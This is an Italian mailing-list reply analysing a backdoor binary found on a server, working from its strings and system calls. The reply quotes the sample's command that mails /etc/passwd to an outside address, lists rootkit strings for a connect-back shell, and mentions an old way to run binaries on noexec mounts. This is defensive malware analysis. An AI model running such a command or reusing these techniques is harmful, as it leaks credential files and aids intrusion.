Re: [ml] backdoor

Marco Bertorello wrote:

> però non trovo informazioni su che tipo di backdoor sia e che
> cosa faccia (a parte spedire ad un indirizzo email il passwd[1]).

a occhio fa qualcosa di piu' che inviare il passwd, comunque
non e' strings ad essere utile ma uno strace e gdb

> /lib/ld-linux.so.2

un po' di tempo fa un exploit per pax consisteva nell'usare
/lib/ld-linux.so.2 per lanciare binari su fs noexec (e io che
mi ero messo su le tmp su tmpfs noexec :P )

> libc.so.6

ci sono stati un bel po' di locali per funzioni varie delle libc

c'e' un bel paper sulle format string su vfprintf e compagni
http://www.securiteam.com/securityreviews/6T0060AEKI.html

> setsid

setsid - creates a session and sets the process group ID.

> /dev/ptmx
> /dev/pty
> /dev/tty
> /dev/null
> /bin/sh

guarda strings di questo rootkit

Usage: %s host port
pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
Fuck you so
/bin/sh No connect
Looking up %s... Failed!
OK
%u Connect Back

> cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@xxxxxxxxx

l'email la manda probabilmente dopo che ha tentato di forkare
e non ha ottenuto uid 0 (passwd e' in read per other mentre
shadow non lo e' e questa potrebbe essere la risposta alla tua
domanda)

> bind
> listen
> klogd

in definitiva non invia solo una mail ma cerca di exploitare
qualcosa (e lo potrai scoprire solo con strace e gdb), di
forkare una shell (suiddata o setsid o chi puo' sapere..) e
di bindarla su una porta

non penso sia una reverse shell dato che non fa connect a nulla

> socket
> setsockopt
> bind
> listen

quindi se la tua macchina e' dietro a port forwarding o simili
non devi temere dato che non sembra residente (a meno che poi
non con firewalk, traceroute, hping e altre diabolerie non si
siano connessi lo stesso.. viva gli stateful firewall)

beh, spero bene per il tuo server : )